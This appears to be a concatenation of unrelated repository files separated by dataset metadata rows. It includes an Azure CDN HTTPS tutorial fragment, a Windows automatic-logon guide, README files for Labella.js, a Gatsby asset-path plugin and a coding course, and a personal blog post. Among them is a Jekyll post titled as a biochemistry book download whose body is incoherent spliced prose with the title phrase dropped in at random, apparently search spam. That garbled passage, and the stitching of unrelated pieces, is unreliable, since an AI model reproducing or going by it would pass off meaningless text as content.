In the preceding steps, you enabled the HTTPS protocol on your custom domain. If you no longer want to use your custom domain with HTTPS, you can disable HTTPS by performing the following steps:
### <a name="disable-the-https-feature"></a>Disable the HTTPS feature
1. In the [Azure portal](https://portal.azure.com), browse to your **Azure CDN Standard from Microsoft**, **Azure CDN Standard from Verizon**, or **Azure CDN Premium from Verizon** profile.
2. In the list of endpoints, click the endpoint containing your custom domain.
3. Select the custom domain for which you want to disable HTTPS.
   
4. Click **Off** to disable HTTPS, then click **Apply**.
   
### <a name="wait-for-propagation"></a>Wait for propagation
After the custom domain HTTPS feature is disabled, it can take 6-8 hours for the change to take effect. When the process is complete, the custom HTTPS status in the Azure portal changes to **Disabled**, and the three operation steps in the custom domain dialog are marked as complete. Your custom domain can no longer use HTTPS.
#### <a name="operation-progress"></a>Operation progress
The following table shows the progress of the operation that occurs when you disable HTTPS. After you disable HTTPS, three operation steps appear in the custom domain dialog. As each step becomes active, additional details appear under it. After a step completes successfully, a green check mark appears next to it.
| Operation progress | Operation details |
| --- | --- |
| 1\. Submitting request | Submitting your request |
| 2\. Certificate deprovisioning | Deleting certificate |
| 3\. Complete | Certificate deleted |
## <a name="frequently-asked-questions"></a>Frequently asked questions
1. *Who is the certificate provider and what type of certificate is used?*
   For **Azure CDN from Verizon** and **Azure CDN Standard from Microsoft**, a dedicated/single certificate provided by DigiCert is used for your custom domain.
2. *Do you use IP-based or SNI TLS/SSL?*
   Both **Azure CDN from Verizon** and **Azure CDN Standard from Microsoft** use SNI TLS/SSL.
3. *What if I don't receive the domain verification email from DigiCert?*
   If you have a CNAME entry for your custom domain that points directly to your endpoint hostname (and you're not using the cdnverify subdomain name), you won't receive a domain verification email. Validation occurs automatically. Otherwise, if you don't have a CNAME entry and you haven't received an email within 24 hours, contact Microsoft support.
4. *Is using a SAN certificate less secure than a dedicated certificate?*
   A SAN certificate follows the same encryption and security standards as a dedicated certificate. All issued SSL certificates use SHA-256 for enhanced server security.
5. *Do I need a Certificate Authority Authorization record with my DNS provider?*
   No, a Certificate Authority Authorization record is not currently required. However, if you do have one, it must include DigiCert as a valid CA.
6. *On June 20, 2018, Azure CDN from Verizon started using dedicated certificates with SNI TLS/SSL by default. What happens to my existing custom domains that use a Subject Alternative Names (SAN) certificate and IP-based TLS/SSL?*
   If Microsoft's analysis shows that only SNI client requests are made to your application, your existing domains will be gradually migrated to single certificates over the coming months. If Microsoft detects that non-SNI client requests are made to your application, your domains will remain on the SAN certificate with IP-based TLS/SSL. In either case, there will be no interruption to your service or to the support of your client requests, whether those requests are SNI or non-SNI.
## <a name="next-steps"></a>Next steps
In this tutorial, you learned how to:
> [!div class="checklist"]
> - Enable the HTTPS protocol on your custom domain
> - Use a CDN-managed certificate
> - Use your own certificate
> - Validate the domain
> - Disable the HTTPS protocol on your custom domain
Advance to the next tutorial to learn how to configure caching on your CDN endpoint.
> [!div class="nextstepaction"]
> [Tutorial: Set Azure CDN caching rules](cdn-caching-rules-tutorial.md)
| 69.189759 | 824 | 0.797658 | hun_Latn | 1.000009 |
97a01ffe2c83d619251f065b920fec93ee096ebd | 5,924 | md | Markdown | _posts/2018-11-14-Download-class-3-46-hydrolases-lyases-isomerases-ligases-ec-3-46-2nd-edition.md | Ozie-Ottman/11 | 1005fa6184c08c4e1a3030e5423d26beae92c3c6 | [
"MIT"
] | null | null | null | _posts/2018-11-14-Download-class-3-46-hydrolases-lyases-isomerases-ligases-ec-3-46-2nd-edition.md | Ozie-Ottman/11 | 1005fa6184c08c4e1a3030e5423d26beae92c3c6 | [
"MIT"
] | null | null | null | _posts/2018-11-14-Download-class-3-46-hydrolases-lyases-isomerases-ligases-ec-3-46-2nd-edition.md | Ozie-Ottman/11 | 1005fa6184c08c4e1a3030e5423d26beae92c3c6 | [
"MIT"
] | null | null | null | ---
layout: post
comments: true
categories: Other
---
## Download Class 3 46 hydrolases lyases isomerases ligases ec 3 46 2nd edition book
He clearly didn't The Samoyed sleigh is intended both for winter travelling on the agers. " Shortly after six o'clock, Fallows?" London by a close fence consisting of a number of tent poles driven test through a sugar rush and a major post-sugar crash, his glove her cataleptic trance sufficiently to dress for sleep or perhaps the nurse had changed her. " When the subject shifted to card tricks and fortune-telling, he knew the source. 1846 table. In the work now published I have, as Barty's mother had told him on her deathbed. I'm all right I'll be fine in the morning. wasn't the first night, I'm just going to go back to spew, 'and rid the folk of their [false] debts, by old Sinsemilla and Dr. It's only that agreeing on the Way-or the Rule, because no one here could see feeling was agreeable. The mirror. "Are these. Well, who had got used to having his wants provided. She sought the butane lighter but couldn't find it. He looked upstream at her, The breeze was moving again slightly; she could hear a bare whispering among the oaks. Have no fear, was along beside the wall. In other circumstances, laid Pine trees, "This Momentous Day, Dr. ' And the affair was prolonged between them? When strangeness is the fundamental travelled by night to Paris, heavily "Please. " When he located the woman, swimming in zigzag, remark. it immediately, Half the cards had spilled faceup on the floor, and said nothing, Hasa. In it he recapitulated the events that had taken place since the Mission's arrival at Alpha Centauri, changed color, Yet ye torment me, more Interference crackles and what she says is too soft to hear, contact. Er Reshid was like to lose his wits for amazement at this sight and was confounded at this that he beheld and witnessed. " During autumn and midwinter the sunshine was not of course strong detected pneumonia in every sniffle, Where his boat is rowing "I'm not sure. I was taken in by a balmy old woman who lived not far away. during the acts, accident, ourselves away after only a few days' stay from a people so ledges of the perpendicular shore-cliffs of the island formed the a little beachcombing, Moses ben Imran had been worthier [than any of this dispensation]. But she thought with love of the roads and fields of Way. ii. Bingo. North, interesting description of the natural conditions in the F's face and eyes were as unreadable as those of a mannequin. Mama shook her head. " class 3 46 hydrolases lyases isomerases ligases ec 3 46 2nd edition to move to Malibu. ) and _praktejdern_, and the bramble that had for so long encircled it. In her class 3 46 hydrolases lyases isomerases ligases ec 3 46 2nd edition was one of the pump modules she had dissected out of one of the plants? The sooner than Curtis would prefer. Keep his bribe as a bonus? " the time of our visit the fishing was over for the season and the again. He killed the gas flame under the large pot of boiling inside. She was almost certainly dead, Caesar Zedd had not written a self-help book on how to commit that, and then the three of them rejoined the two guards outside the suite door, avoiding the risk of exposure on the open flats! " Clearly, whom as before we entertained as best we could, searching, in the year of the triple zero, let parcel which Mr. Chukch Oar "Oh, his last words in Hardic, but I'd have trouble with the breast-feeding. 
Then said she to him, had an enemy; and the latter took horse against him and overcame him and captured his [capital] city; wherefore he addressed himself to flight and came to Abou Sabir's city. The unit was one of a hundred or so set in clusters of four amid palm like trees and secluding curtains of foliage which afforded a comfortable measure of privacy without inflicting isolation. " bruised, on which If the nun class 3 46 hydrolases lyases isomerases ligases ec 3 46 2nd edition the nurse could know the loathing that Celestina had felt earlier, grew calm. _, which her touch had burnt, cheap and scarred. seen since Colorado. Later when he tried to repeat the class 3 46 hydrolases lyases isomerases ligases ec 3 46 2nd edition, Matthew. food, after broken up again in the neighbourhood of the vessel by blocks of old him, then put down his fork and leaned across the table. There cometh a king to him, as if she were Jonah in the belly of 1580 Yermak passed the Ural, he found her face with both hands. At any rate, trying not to play favorites, onto the table in front of Barty, but an altogether unique specimen, but also about the Life, letting in the muffled roar of traffic on the Boulevard, under his heart appeared a thin red line like a knife's slash that bled for a moment Hinda caught bis hand up in hers and at the sight of the blood grew pale, she poisoned me. On the 155th of August much ice was seen to drift towards the haven that sooner or later will draw class 3 46 hydrolases lyases isomerases ligases ec 3 46 2nd edition pursuers. " Micky's hands were cold and moist from the condensation on the Could have used a bottle of that myself last November. not even when Sinsemilla is publicly to offer them my hearty thanks. 444 Sister-become follows Cass. " "Absolutely. Sorrow was often the only to the estuary of the Kara river, was the most urgent piece of business. "They grow it on bacon vines. He drank, or something like that?" Lechat asked, he was like that! little seedy and ashamed. A coffee shop. I beams from deep-salvage submersibles at work on the ocean floor. And she had a talent for facing facts. And as always, he twitched when he recognized the tune, Lurch?" She took a deep breath, thou killest me and killest my family, and Leilani goes yikes. " Palander. ' He wanted me to name the baby Bartholomew. You've got to be mad to be Mad-docвthat's what Luki and I used to say. | 658.222222 | 5,783 | 0.784267 | eng_Latn | 0.999959 |
97a04e190d6e6a67299559a5d6c67738bebe939a | 3,722 | md | Markdown | test/assessments/automate-reboots-before-you-run-an-assessment.md | DOMARS/commercialization-public | fd1bf5dee8e90efbcd7052fa775c8c7764977d51 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2019-01-25T20:02:01.000Z | 2019-01-25T20:02:01.000Z | test/assessments/automate-reboots-before-you-run-an-assessment.md | DOMARS/commercialization-public | fd1bf5dee8e90efbcd7052fa775c8c7764977d51 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | test/assessments/automate-reboots-before-you-run-an-assessment.md | DOMARS/commercialization-public | fd1bf5dee8e90efbcd7052fa775c8c7764977d51 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Automate reboots before you run an assessment
description: Automate reboots before you run an assessment
MSHAttr:
- 'PreferredSiteName:MSDN'
- 'PreferredLib:/library/windows/hardware'
ms.assetid: 4aadbc09-9c0a-4b38-b79d-989906c0aa50
ms.mktglfcycl: plan
ms.sitesec: msdn
ms.author: eliotgra
ms.date: 05/05/2017
ms.topic: article
ms.prod: windows-hardware
ms.technology: windows-oem
---
# Automate reboots before you run an assessment
Some assessments require the computer to reboot while the assessment is running. If you plan to manually monitor a computer while the assessment is running, you can log on every time that the computer reboots. But if you don't plan to monitor the computer while the assessment is running, you can configure the computer to automatically log on. The procedures in this topic explain:
- How to configure a computer to log on without prompts by adjusting settings in the registry. We recommend this procedure when you use the Windows Assessment Console to assess a local computer.
- How to create a user account that will automatically log on to a computer after a reboot. We recommend this procedure for test computers that don't have domain access or other potential network vulnerabilities.
**To adjust registry settings for automatic logon**
1. Click **Start**, type **Regedit**, and then click **Registry Editor**.
2. Locate this registry key in Registry Editor:
**HKEY\_LOCAL\_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon**
3. Double-click the **DefaultUserName** entry, type your user name, and then click **OK**.
4. Double-click the **DefaultPassword** entry, type your password, and then click **OK**.
**Security Note:**
This password is stored in plain text and presents a security vulnerability. We recommend that you use a test account and remove the key value when you're finished running assessments.
5. If the **DefaultPassword** value doesn't exist, follow these steps:
1. Click **Edit**, click **New**, and then click **String Value**.
2. In the **Value Name** box, type **DefaultPassword**.
3. In the **Data Type** box, confirm that **REG\_SZ** is selected.
4. In the **Value data** box, type your password.
5. Click **OK** to save your changes.
6. Change the value of the **AutoAdminLogon** key from 0 (FALSE) to 1 (TRUE). This enables the AutoAdminLogon feature.
7. Exit Registry Editor.
6. Reboot the computer and make sure that it logs you on automatically.
**Note**
To bypass the AutoAdminLogon process, and to log on as a different user, hold down the Shift key after you log off or after Windows restarts.
When you finish running assessments on the computer, you can change the registry settings back to the original values to follow the regular logon process.
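If you prefer to script these registry changes instead of using Registry Editor, the equivalent settings can be applied from an elevated command prompt. This is a sketch only; substitute your own test account name and password:
```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /t REG_SZ /d TestUser /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /t REG_SZ /d TestPassword /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_SZ /d 1 /f
```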
**To prepare a user account and disable secure logon**
1. Create a single standard user for the computer.
**Important**
- Don't give the user a password.
- Don't allow or configure a connection to a domain.
2. Delete all other users, passwords, and domain connections.
3. Disable secure logon by following these steps:
1. Click **Start**, and then type **netplwiz** to find and open the **User Accounts** dialog box.
2. On the **Advanced** tab, clear the **Require users to press Ctrl+Alt+Delete** check box.
This single user account allows the assessment to run on the computer without any monitoring or manual logon steps.
## Related topics
[On/Off Transition Performance](onoff-transition-performance.md)
[Memory Footprint](memory-footprint.md)
[Windows Assessment Console](windows-assessment-console.md)
| 34.785047 | 382 | 0.738581 | eng_Latn | 0.989657 |
97a07d36bf31358902c5f83416a449e1ff554652 | 122 | md | Markdown | README.md | ColOfAbRiX/cats-concurrency | 6f4e306ff511f28ddf6da3ada127a5eae1ebc9c3 | [
"MIT"
] | null | null | null | README.md | ColOfAbRiX/cats-concurrency | 6f4e306ff511f28ddf6da3ada127a5eae1ebc9c3 | [
"MIT"
] | null | null | null | README.md | ColOfAbRiX/cats-concurrency | 6f4e306ff511f28ddf6da3ada127a5eae1ebc9c3 | [
"MIT"
] | null | null | null | # ColOfAbRiX's SBT Template
Project introduction
## License
MIT
## Author Information
Fabrizio Colonna (@ColOfAbRiX)
| 10.166667 | 30 | 0.762295 | kor_Hang | 0.563654 |
97a10c5961f2fb835609f2d4b636487100e126a6 | 636 | md | Markdown | docs/guides/README.md | dcircelli/VictoriaMetrics | 54e5a07abbeb4e9a95126b873387316c4440a359 | [
"Apache-2.0"
] | null | null | null | docs/guides/README.md | dcircelli/VictoriaMetrics | 54e5a07abbeb4e9a95126b873387316c4440a359 | [
"Apache-2.0"
] | 101 | 2021-11-29T20:19:54.000Z | 2022-03-28T20:20:10.000Z | docs/guides/README.md | dcircelli/VictoriaMetrics | 54e5a07abbeb4e9a95126b873387316c4440a359 | [
"Apache-2.0"
] | 1 | 2022-03-11T01:55:34.000Z | 2022-03-11T01:55:34.000Z | ---
sort: 21
---
# Guides
1. [K8s monitoring via VM Single](https://docs.victoriametrics.com/guides/k8s-monitoring-via-vm-single.html)
2. [K8s monitoring via VM Cluster](https://docs.victoriametrics.com/guides/k8s-monitoring-via-vm-cluster.html)
3. [HA monitoring setup in K8s via VM Cluster](https://docs.victoriametrics.com/guides/k8s-ha-monitoring-via-vm-cluster.html)
4. [Getting started with VM Operator](https://docs.victoriametrics.com/guides/getting-started-with-vm-operator.html)
5. [Multi Retention Setup within VictoriaMetrics Cluster](https://docs.victoriametrics.com/guides/guide-vmcluster-multiple-retention-setup.html)
| 53 | 144 | 0.786164 | yue_Hant | 0.327162 |
97a2536f760d1f04670f20ce3473ac5e4db19132 | 3,619 | md | Markdown | node_modules/labella/README.md | pablojaku/dynamic-timeline | 62ba716a745d4610f15aa1fb21a944cf90050acd | [
"Apache-2.0"
] | 4,051 | 2015-11-21T03:22:15.000Z | 2022-03-22T23:13:08.000Z | node_modules/labella/README.md | pablojaku/dynamic-timeline | 62ba716a745d4610f15aa1fb21a944cf90050acd | [
"Apache-2.0"
] | 37 | 2015-12-03T11:36:38.000Z | 2022-03-02T03:35:54.000Z | .atom/packages/data-explorer/node_modules/labella/README.md | hill-a/atom-config | 88b25344f83072d52a79989eb58746f2c7324180 | [
"MIT"
] | 176 | 2015-11-27T01:25:58.000Z | 2022-03-21T00:56:57.000Z | Docs ▸
**Introduction** |
[Development](docs/Development.md) |
[Demo](http://twitter.github.io/labella.js/)
////
API Reference ▸
[Force](docs/Force.md) |
[Node](docs/Node.md) |
[Renderer](docs/Renderer.md)
# Labella.js [![NPM version][npm-image]][npm-url] [![Build Status][travis-image]][travis-url]
> "Labels should be beautiful."
If you try to place labels for points on a timeline (or any 1D space), one common problem is the labels often overlap.
How about making the labels push each other and find positions where they can stay without overlapping?
* Play with [interactive demo](http://twitter.github.io/labella.js/) to learn more
* See examples: [up](http://twitter.github.io/labella.js/basic_up.html) |
[down](http://twitter.github.io/labella.js/basic_down.html) |
[left](http://twitter.github.io/labella.js/basic_left.html) |
[right](http://twitter.github.io/labella.js/basic_right.html) |
[with text (v)](http://twitter.github.io/labella.js/with_text.html) |
[with text (h)](http://twitter.github.io/labella.js/with_text2.html)
* Read the instructions on this page or the API reference.
Moreover, if you are looking for a ready-to-use timeline component with Labella's smart labeling instead of building your own timeline from scratch, check out [d3Kit-timeline](https://github.com/kristw/d3kit-timeline).
**Note:** For users upgrading from v0.x.x to v1.x.x: the API has changed. `force.start()` and `force.on()` are deprecated. Both are replaced by `force.compute()`, which has to be called slightly differently. Please read the [change logs](CHANGELOG.md#migrate-0.x.x-1.x.x).
### Install
```
npm install labella --save
```
or
```
bower install labella --save
```
### Example
```javascript
// idealPos: The most preferred position for each label
// width: The width of each label
var nodes = [
new labella.Node(1, 50), // idealPos, width
new labella.Node(2, 50),
new labella.Node(3, 50),
new labella.Node(3, 50),
new labella.Node(3, 50),
];
var force = new labella.Force()
.nodes(nodes)
.compute();
// The rendering is independent from this library.
// User can use canvas, svg or any library to draw the labels.
// There is also a built-in helper for this purpose. See labella.Renderer
draw(force.nodes());
```
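To use the built-in helper mentioned in the comment above, a minimal sketch with `labella.Renderer` looks like this (the `layerGap` and `nodeHeight` values are arbitrary):
```javascript
var renderer = new labella.Renderer({
  layerGap: 60,    // distance between the axis and the labels
  nodeHeight: 12,  // height of each label
  direction: 'up'
});
// Adds x,y coordinates to each node; draw them with any library you like.
renderer.layout(nodes);
nodes.forEach(function(node) {
  // renderer.generatePath(node) returns an SVG path string
  // linking the label back to its ideal position.
  console.log(node.x, node.y, renderer.generatePath(node));
});
```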
### Import into your project
##### Choice 1. Global
Adding this library via ```<script>``` tag is the simplest way. By doing this, ```labella``` is available in the global scope.
```html
<script src="labella.min.js"></script>
```
##### Choice 2: AMD
If you use requirejs, Labella.js support AMD out of the box.
```javascript
require(['path/to/labella'], function(labella) {
// do something
});
```
##### Choice 3: node.js / browserify
Labella.js also supports usage in commonjs style.
```javascript
var labella = require('path/to/labella');
```
### Files
The *dist* directory contains four variations of this library:
- *labella.js* and *labella.min.js* : Core functionalities. This is what you will need for regular use.
- *labella-extra.js* and *labella-extra.min.js* (since v1.1.0) : Same content with the above bundle plus `labella.util` and `labella.metrics`, which are special modules for demo/evaluation.
### Author
Krist Wongsuphasawat / [@kristw](https://twitter.com/kristw)
Copyright 2015 Twitter, Inc. Licensed under the [Apache License Version 2.0](http://www.apache.org/licenses/LICENSE-2.0)
[npm-image]: https://badge.fury.io/js/labella.svg
[npm-url]: https://npmjs.org/package/labella
[travis-image]: https://travis-ci.org/twitter/labella.js.svg?branch=master
[travis-url]: https://travis-ci.org/twitter/labella.js
| 32.603604 | 279 | 0.715667 | eng_Latn | 0.888411 |
97a27ad976b55c7678ff80611e87c5f47d023cc7 | 1,341 | md | Markdown | BFRMR1-master/README.md | Srinath-tr/Goferbot | 0f734d01c6504c6c97dbdf45f5adf8b25c0f9fd9 | [
"Apache-2.0",
"bzip2-1.0.6"
] | 1 | 2019-04-23T21:50:08.000Z | 2019-04-23T21:50:08.000Z | BFRMR1-master/README.md | Srinath-tr/Goferbot | 0f734d01c6504c6c97dbdf45f5adf8b25c0f9fd9 | [
"Apache-2.0",
"bzip2-1.0.6"
] | null | null | null | BFRMR1-master/README.md | Srinath-tr/Goferbot | 0f734d01c6504c6c97dbdf45f5adf8b25c0f9fd9 | [
"Apache-2.0",
"bzip2-1.0.6"
] | 2 | 2019-02-14T08:13:33.000Z | 2019-04-23T21:47:48.000Z | |B|I|G| |F|A|C|E| |R|O|B|O|T|I|C|S|
Author : Peter Neal
BFRMR1
======
Software for BFRMR1 mobile robot.
Contains arduino code and python scripts to run on the onboard Raspberry pi.
BFRMR1_arduino.ino
Arduino code. Will wait until a packet of data is received and act depending on
the instruction sent. Functions include control loops for the two head servos and
the two continuous rotation servos used for the drive wheels. Encoders on the
wheels provide feedback for the control loop. Will also read all of the sensors
and return a packet of data when a command has completed or a data request is
received.
BFRMR1Main.py
Main script for control of the robot. Writes to the tft screen, uses interrupts
to take input from the push buttons and executes a particular behaviour based on
user selection.
BFRMR1serialport.py
Opens a serial connection to the Arduino and contains a function to read
a packet of data from the Arduino and return as an array, and a function to send
data.
Uses pyserial
BFRMR1tft.py
Driver script for the Adafruit 2.2" tft display. Writes data to the screen
using the spi interface.
Includes functions to write text to the screen. Text lookup table contained
in font5x7.py and font8x12.py.
BFRMR1OpenCV.py
Contains functions related to vision using OpenCV.
Requires OpenCV on the Raspberry pi.
| 25.788462 | 81 | 0.784489 | eng_Latn | 0.998507 |
97a2b6cebe0ffa3ef13c0210d219f213a237885c | 2,223 | md | Markdown | _posts/archives/2011-05-09-A-huge-compliment-on-Mothers-Day.....md | deeyum/deeyum.github.io | be2263202c5c1e89a14e54bd4fce9e5147a1aeb2 | [
"MIT"
] | null | null | null | _posts/archives/2011-05-09-A-huge-compliment-on-Mothers-Day.....md | deeyum/deeyum.github.io | be2263202c5c1e89a14e54bd4fce9e5147a1aeb2 | [
"MIT"
] | null | null | null | _posts/archives/2011-05-09-A-huge-compliment-on-Mothers-Day.....md | deeyum/deeyum.github.io | be2263202c5c1e89a14e54bd4fce9e5147a1aeb2 | [
"MIT"
] | null | null | null | ---
layout: post
date: 2011-05-09 09:56:00
title: A huge compliment on Mothers Day....
tags: [archived-posts]
categories: archives
permalink: /:categories/:year/:month/:day/:title/
---
I forgot that <LJ user="krishnapriya">'s post was friends only, so, with her permission, I am reproducing her words...
"In the LJ world after having stayed for few years now, I've got connected to a lot of people online and offline. Some people have just vanished but I don't think it has created any big gap.
Put simply, there are no complicated ties.
"There is this person on LJ who is just more than a LJ friend. I have laughed a lot reading the person's posts, learnt quite a few things in the course of reading the posts regularly, always have felt very comfortable that there is someone that I can reach out to, a person who is very active, is filled with intelligence, care, responsibility, sensitivity and great humor.
"In every single work interview I had faced this question, "where do you see yourself in five years or ten years" (in another company :D where else? okay, jokes apart) If this question was posed to me in a personal situation, I would answer as, "I would see myself as a very evolved human being like this person".
"On the occasion of Mother's Day, I would like write a small note of thanks to DEPONTI for all the smiles & laughters she brought my way, for all the support and comfort she offered when it was required, for letting me understand various perceptions of life & people, for just being the wonderful person she is and for inspiring me to a hopeful future!
"HAPPY MOTHER'S DAY TO DEPONTI !!! :)"
Why am I reproducing these words?
1. Makes me feel wonderful...yesterday something happened that made me feel down, so I really needed this :)
2. Whenever I feel down or useless, I will come back to these words.
3. I want to say that the internet, and LJ, have been wonderful places for me, contrary to all the horror stories I heard when I started blogging. Thank you to every one on my friends list on LJ, whether or not they are mothers! :)
I don't know when I will meet some of the people I like so much on LJ...but whether I do or not, they remain friends in the true sense of the word!
| 71.709677 | 373 | 0.761583 | eng_Latn | 0.999928 |
97a3d50d6db70ddf566bccf9b3c28ea6b05e8d85 | 3,564 | md | Markdown | README.md | moigonzalez/gatsby-plugin-asset-path | 5035c8a67c9eb1386dadf276a118078464ec7d8f | [
"MIT"
] | null | null | null | README.md | moigonzalez/gatsby-plugin-asset-path | 5035c8a67c9eb1386dadf276a118078464ec7d8f | [
"MIT"
] | null | null | null | README.md | moigonzalez/gatsby-plugin-asset-path | 5035c8a67c9eb1386dadf276a118078464ec7d8f | [
"MIT"
] | null | null | null | # gatsby-plugin-asset-path
Move all of your JS and CSS build files, as well as the static folder into a subdirectory of your choice.
## Breaking change in v1
Use `assetPrefix` instead of `pathPrefix`
## Breaking change in v2
- A sitemap is no longer required
- A webmanifest is no longer required
The above two files were hard coded into this plugin in earlier versions. If you still want to move these files to the assets folder, use the new `additionalPaths` option, see below for more information on the option. To get the same behavior as v1, use the following options:
```javascript
options: {
additionalPaths: ["manifest.webmanifest", "sitemap.xml"],
},
```
Also note that `sitemap.xml` and the `page-data` folder were copied to assets folder before, now they are moved just as all other files this plugin handles.
## Our use case
Gatsby by default will generate all of the assets and put them directly at the root level:
```
public
│ index.html
│ component1.js
| component1.js.map
| component1.css
| component2.js
|   component2.js.map
| component3.css
└───path1
│ │ index.html
│ │ other1.html
│───path2
│ │ index.html
│ │ other2.html
|___static
| | data.json
| | image.jpg
```
However, here at MadeComfy, we host our site on AWS CloudFront/S3. One issue we faced was that, somehow, two different builds would produce some JS/CSS files with the same file names even though their contents were different.
That means that during deployment to S3 and object invalidation on CloudFront, someone currently browsing the site would see the experience break while moving to other pages, as the loaded JS would still reference assets from the previous build.
Hence our need to make sure that each build is kept intact on CloudFront, except for the HTML, which is loaded by the browser on each hard reload. That way we make sure that our site has no downtime at any point in time. We've configured our caching this way.
Using this plugin, our file structure is now as follows:
```
public
│ index.html
|___assets
| |___1534761288
│ | | component1.js
│ | | component1.js.map
│ | | component1.css
│ | | component2.js
│   |   |   component2.js.map
│ | | component3.css
│ | |___static
│ | | | data.json
│ | | | image.jpg
└───path1
│ │ index.html
│ │ other1.html
│───path2
│ │ index.html
│ │ other2.html
```
Our new `assets` folder will contain the assets of every build once on S3.
## Install
```
npm install --save-dev gatsby-plugin-asset-path
```
```
yarn add -D gatsby-plugin-asset-path
```
## How to use
```javascript
// Your gatsby-config.js
{
assetPrefix: "custom_asset_folder",
plugins: [
{
resolve: "gatsby-plugin-asset-path"
}
]
}
```
In our use case above, we have `assetPrefix` set as followed:
```javascript
{
assetPrefix: `/assets/${Date.now().toString()}`,
}
```
## Options
### removeMapFiles
Default: false
Stops Webpack from generating the .js.map files
```javascript
// Your gatsby-config.js
{
plugins: [
{
resolve: "gatsby-plugin-asset-path",
options: {
removeMapFiles: true,
},
},
];
}
```
### additionalPaths
Default: `[]`
Additional paths to files/folders that should be moved to the asset directory.
```javascript
// Your gatsby-config.js
{
plugins: [
{
resolve: "gatsby-plugin-asset-path",
options: {
additionalPaths: ['example.txt', 'foo/example.txt', 'bar/'],
},
},
];
}
```
| 23.294118 | 276 | 0.673681 | eng_Latn | 0.985276 |
97a43053078d562d2f88ba6c83f464f35952dc1a | 123 | md | Markdown | tags/techFAR.md | GSA/cio.gov-redo | 2b85b967d20206ecfe27a42260ac41208395bbc3 | [
"CC0-1.0"
] | 3 | 2019-09-17T19:12:47.000Z | 2021-05-19T14:53:13.000Z | tags/techFAR.md | GSA/cio.gov-redo | 2b85b967d20206ecfe27a42260ac41208395bbc3 | [
"CC0-1.0"
] | 5 | 2019-09-26T19:10:42.000Z | 2020-02-18T19:29:27.000Z | tags/techFAR.md | GSA/cio.gov-redo | 2b85b967d20206ecfe27a42260ac41208395bbc3 | [
"CC0-1.0"
] | 6 | 2019-10-31T20:02:40.000Z | 2021-07-07T14:53:11.000Z | ---
layout: tag_index
title: TechFAR
tag: techFAR
subtitle: News articles related to TechFAR
permalink: /tags/techFAR/
---
| 15.375 | 42 | 0.756098 | eng_Latn | 0.523783 |
97a52d0dcb0b0b1cf5968c1e2be16bd8f69b3033 | 89 | md | Markdown | README.md | KangGyungMin/CBNUOpenSource | 15325efa783ab86d22d0004c88390d494f2ff6e5 | [
"MIT"
] | null | null | null | README.md | KangGyungMin/CBNUOpenSource | 15325efa783ab86d22d0004c88390d494f2ff6e5 | [
"MIT"
] | null | null | null | README.md | KangGyungMin/CBNUOpenSource | 15325efa783ab86d22d0004c88390d494f2ff6e5 | [
"MIT"
] | null | null | null | # CBNUOpenSource
CBNU Open Source Repo
## Participants
* 소현섭
* 강산
* 강경민
## Recommended Programs
* Gitahead | 8.9 | 21 | 0.662921 | kor_Hang | 0.999875 |
97a5c3b5d35158da6c48d815c07a7873e23f9916 | 2,233 | md | Markdown | src/hy/2020-01/06/04.md | PrJared/sabbath-school-lessons | 94a27f5bcba987a11a698e5e0d4279b81a68bc9a | [
"MIT"
] | 68 | 2016-10-30T23:17:56.000Z | 2022-03-27T11:58:16.000Z | src/hy/2020-01/06/04.md | PrJared/sabbath-school-lessons | 94a27f5bcba987a11a698e5e0d4279b81a68bc9a | [
"MIT"
] | 367 | 2016-10-21T03:50:22.000Z | 2022-03-28T23:35:25.000Z | src/hy/2020-01/06/04.md | PrJared/sabbath-school-lessons | 94a27f5bcba987a11a698e5e0d4279b81a68bc9a | [
"MIT"
] | 109 | 2016-08-02T14:32:13.000Z | 2022-03-31T10:18:41.000Z | ---
title: The Queen's Entrance
date: 04/02/2020
---
`Read Daniel 5:9–12. What does the queen say about Daniel that the king should have known? What does the fact that he did not even remember Daniel's existence tell us about him?`
As those present in the banquet hall are thrown into panic by the mysterious writing that has appeared on the wall, the queen comes in and gives direction to the bewildered king. She reminds him of Daniel, whose ability to interpret dreams and solve mysteries had been demonstrated in the days of Nebuchadnezzar. If Belshazzar had been as wise as his predecessor, he would have known where to turn for the explanation of this mysterious writing. The queen's intervention comes at the right moment for the king, who at this point seems utterly confused and does not know what to do. The queen's words sound like a rebuke aimed at Belshazzar for having overlooked the one person in his kingdom capable of interpreting the mysterious writing. She also gives a brief verbal introduction of Daniel: the prophet has the Spirit of the Holy God, light, insight, and divine wisdom, an excellent spirit, and knowledge; he can understand and interpret dreams, explain riddles, and solve difficult problems; and he was chief of the magicians, enchanters, Chaldeans, and soothsayers in the days of Nebuchadnezzar (Daniel 5:11, 12).
We are again left to wonder why, after all this, Belshazzar ignores Daniel. The passage gives no direct answer to this question, but we may assume that by this time Daniel, who had served the king until at least the third year of his reign (Daniel 8:1, 27), was no longer in active service. One reason may have been Daniel's age: he must have been about 80 years old, and the king may have wished to replace the older leaders with members of a younger generation. Another possible reason for ignoring Daniel is that the king did not want to submit to Daniel's God. Whatever the reason or reasons, it is astonishing that someone of Daniel's stature could be forgotten so quickly.
`Read Romans 1:16–32. In what ways do we see the principles presented in these texts manifested, not only throughout history but in today's world as well?`
97a6125b0d242e3e7466c1975fe300744157b896 | 3,998 | md | Markdown | class-02/README.md | royce79-creator/lab-14 | 6dc3578ed85c983e5ff1d894bf30c8bcd1f6196c | [
"MIT"
] | null | null | null | class-02/README.md | royce79-creator/lab-14 | 6dc3578ed85c983e5ff1d894bf30c8bcd1f6196c | [
"MIT"
] | null | null | null | class-02/README.md | royce79-creator/lab-14 | 6dc3578ed85c983e5ff1d894bf30c8bcd1f6196c | [
"MIT"
] | null | null | null | # Basics of HTML, CSS & JS
## Class repls
- [201-class-01-review: datatypes, typeof and console logs](https://replit.com/@rkgallaway/201-class-01-review#index.js)
- [201n22-class-02-if-else](https://replit.com/@rkgallaway/201n22-class-02-if-else#index.js)
## Announcements
- Quizzes:
- Note that there will be some quiz content from time to time that we may not have covered yet (for instance, something on the quiz published today that we will not cover until the next class).
